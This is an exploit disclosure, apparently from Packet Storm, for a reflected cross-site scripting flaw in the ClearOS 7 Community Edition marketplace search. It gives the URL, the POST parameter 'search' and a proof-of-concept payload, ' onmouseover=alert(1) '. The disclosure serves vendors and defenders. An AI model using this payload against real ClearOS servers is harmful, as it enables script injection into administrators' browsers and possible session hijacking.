ClearOS 7 Community Edition suffers from a cross site scripting vulnerability.
4838f676acff00168df9e27d725f70e8f6ae331dc06f1947191b7ffaa265d364##################################################################################################################################
# Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting
# Date: 06.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.clearos.com
# Software Link:
https://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso
# Version: 7
##################################################################################################################################
Introduction
ClearOS is a small business server operating system with server,
networking, and gateway functions. It is designed primarily for homes,
small, medium, and distributed environments. It is managed from a web based
user interface, but can also be completely managed and tuned from the
command line. ClearOS is available in a free Community Edition, which
includes available open source updates and patches from its upstream
sources. ClearOS is also offered in a Home and Business Edition which
receives additional testing of updates and only uses tested code for
updates. Professional tech-support is also available. Currently ClearOS
offers around 100+ different features which can be installed through the
onboard ClearOS Marketplace.
#################################################################################
XSS details
#################################################################################
XSS1 | Reflected
URL
https://192.168.2.104:81/app/marketplace/search
METHOD
Post
PARAMETER
search
PAYLOAD
' onmouseover=alert(1) '
#################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed